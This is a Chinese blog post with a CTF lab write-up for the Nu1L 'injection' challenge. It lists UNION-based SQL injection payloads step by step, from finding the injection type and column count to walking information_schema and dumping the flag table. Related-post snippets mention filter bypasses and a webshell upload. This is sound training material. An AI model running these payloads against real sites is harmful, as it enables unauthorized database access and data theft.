NU1LCTFer的成长之路-web入门-CTF中的sql注入-injection-wp

最新推荐文章于 2024-02-04 12:13:02 发布
最新推荐文章于 2024-02-04 12:13:02 发布
阅读量148 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/118313280
版权

injection

主页是这个样子

判断注入类型 数字型

id=1 and 1=1#
id=1 and 1=2#

判断列数 两列

id=1 order by 2#

查询是否有显示位 union联合查询注入 2号位

id=1 union select 1,2#

查询数据库 ctfhub、informaion_schema

id=1 union select 1,(select concat(schema_name) from information_schema.schemata limit 0,1)#

id=1 union select 1,(select concat(schema_name) from information_schema.schemata limit 1,1)#

查询表(ctfhub) flag、info、

id=1 union select 1,(select concat(table_name) from information_schema.tables where table_schema='ctfhub' limit 0,1)#

id=1 union select 1,(select concat(table_name) from information_schema.tables where table_schema='ctfhub' limit 1,1)#

查询字段(flag) flag

id=1 union select 1,(select concat(column_name) from information_schema.columns where table_name='flag' limit 0,1)#

dump数据

id=1 union select 1,(select flag from flag)#

居上7788
关注
专栏目录
N1CTF WEB WriteUp
heySister
03-13 4431
77777 作为一个小白,瑟瑟发抖地选择了这道被解出次数最多的题目….emmm…还是有一些收获的。 首先题目给出了一些代码和一些信息: 信息是关于安装配置虚拟机的…和我之前配置环境的步骤,指令差不多…感觉应该没什么问题,就只是告诉我们服务器上有这个东西。 给出的代码就比较关键了。而且题目About 里说可以修改points ,告诉我们flag 是admin's password...
CTF-Web-SQL注入
beihai2013
01-26 3309
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
Nu1LCTFer成长之路docker环境配置
生活·代码_这里是青_分享快乐
11-05 1007
这里写自定义目录标题一、安装docker二、配置yml文件并启动三、遇到的一些问题汇总 想复现书上的题目,又没学过docker,给的docker-compose.yml是什么也不清楚,又不想花很时间去系统学docker,只想做CTF的题目,亲自问了Nu1L队长veneno大佬也没有什么快速的办法,毕竟官网没有出平台,静下心学了下,一顿搜索,解决了,谢谢veneno。 一、安装docker 推荐使用Ubuntu,我用的版本是18.04 sudo apt install docker.io sudo syste
NU1LCTFer成长之路-web入门-CTFsql注入-sql注入-1-wp
居上
06-28 248
sql注入-1 主页是这个样子 判断注入类型 字符型 单引号 id=1' and 1=1--+ id=1' and 1=2--+ 判断列数 三列 id=-1' order by 3--+ 查询是否有显示位 union联合查询注入 2、3号位 id=-1 union select 1,2,3--+ 查询数据库 informaion_schema、note id=-1' union select 1,(select concat(schema_name) from information
2020NU1LCTF两道pwn
abelxu
10-25 488
Signin 分析 new函数 只能对两个vector进行操作。每次new的数量超过限制时就会申请两倍的空间并把原来的空间释放 unk_2032A0和unk_2032C0的数据结构 struct Node{ void begin;#指向第一个元素,也是堆地址 void now;#指向当前元素 void end;#指向最后一个元素 } show函数 输出Node.now指向的元素 delete函数 并不会检测now指针是否小于begin。多次释放配合show可以泄露堆上的内容。 0x
NU1LCTFer成长之路-web入门-CTFsql注入-Injection V2.0-wp
居上
06-29 145
Injection V2.0 是个登陆框,有两个post的参数,user和pass,先尝试使用一般的联合查询 user=admin' and 1=2#&pass=1 他过滤了一些东西,把空格换成/**/ 继续 user=admin'/**/and/**/1=2#&pass=1 user=admin'/**/and/**/1=1#&pass=1 可以看到返回了两种不同的状态 用户不存在=>False 密码错误=>True 返回密码错误,也就是True
CTF-WEB
最新发布
just do it
02-04 1355
—http命令行工具,支持文件的上传和下载,可用于扒取内容(url设为百度,就会显示百度的界面——但此时不是跳转到百度,而是在当前页面显示百度的前端——对百度来说,是请求页面的前面的网站请求他的,不是我们的真实IP去请求的——相当于借刀杀人)一般情况下,传参都是传给当前网页,但如果当前网页是重定向的话,重定向的URL本身就是原URL的传参,如果想要文件的读取权限,只能GET传参跟在URL的后面,不能使用POST传参,POST传参是传给原来的URL。
2021第五空间CTF_web_wp
meteox的博客
09-20 2299
web WebFTP 这个开始时有个1.txt直接访问,里面就有包括flag等的各种环境信息,不知道是忘删了还是有师傅导出的、、、 这个程序直接GitHub上可以找到源代码,里面有个php探针,这就可以得到各种信息了 https://github.com/wifeat/WebFTP/blob/master/Readme/mytz.php 在phpinfo可以得到flag http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo pkloveclou
BUUCTF刷题记录(持续更新~)
热门推荐
xiaolong22333的博客
04-03 6万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
CTF-WEB入门DOC-2019版1
08-03
CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其的关键知识点: 一、CTF简介及目标: CTF...
CTF---Web---SQL注入---07---注入点+level
qq_22160557的博客
07-31 500
文章目录前言一、题目描述二、解题步骤1、寻找注入点2、请求包保存3、sqlmap爆破三、总结 前言 题目分类: CTFWebSQL注入—07—注入点+level 一、题目描述 题目:添加备注 二、解题步骤 1、寻找注入点 Step1:本题在常规注入的地方,是无法注入的:但是这是下面有个添加备注的地方 2、请求包保存 Step2:添加备注后,抓包后,保存为txt文件 3、sqlmap爆破 Step3:丢到sqlmap跑就行了。 注入点为id,注入类型为以时间为基础的时间盲注。 Step4:爆
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 446
个人CTF学习之路
CTFHUB-web-SQL注入
ookami6497的博客
11-29 837
CTFHUB SQL
CTF---Web---SQL注入---11---注入列的选择与id的值
qq_22160557的博客
08-01 836
文章目录前言一、题目描述二、解题步骤1、尝试列数2、爆表的两种方式3、爆列、字段三、总结 前言 题目分类: CTFWebSQL注入—11—注入列的选择与id的值 一、题目描述 题目:SQL注入 二、解题步骤 1、尝试列数 Step1:尝试列数,1 union select 1,2,3,4# 列数为4列 1 union select 1,2,database(),4# 数据库名为:inject_05 2、爆表的两种方式 Step2:爆表 -1 union select 1,(select grou
buuctf-web-[ACTF2020 新生赛]Upload 1-wp
居上
11-11 3621
[ACTF2020 新生赛]Upload 1 来到主页发现是一个文件上传的题目。 先随便上传一个文件试一试。 我上传了一个.php结尾的PHP一句话木马,可以看到被过滤了。审查一下元素。 可以发现前端有一个事件,直接删除该事件。再上传一遍试一试。 发现还是不能传上去,后端肯定也做了过滤。我们可以创建一个test.phtml文件。 对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。 将以下代码写入该文件。 <script language='php'>@eval($_POST[
buuctf-web-[强网杯 2019]随便注-wp
居上
06-22 1387
[强网杯 2019]随便注 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
buuctf-web-[SUCTF 2019]EasySQL 1-wp
居上
06-22 1032
[SUCTF 2019]EasySQL 源码 网上找的源码 <?php session_start(); include_once "config.php"; $post = array(); $get = array(); global $MysqlLink; //GetPara(); $MysqlLink = mysqli_connect("localhost",$datauser,$datapass); if(!$MysqlL
buuctf-misc-qr-wp
居上
06-21 733
qr 知识点 工具QR Research的使用 过程 使用QR Research得到flag
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值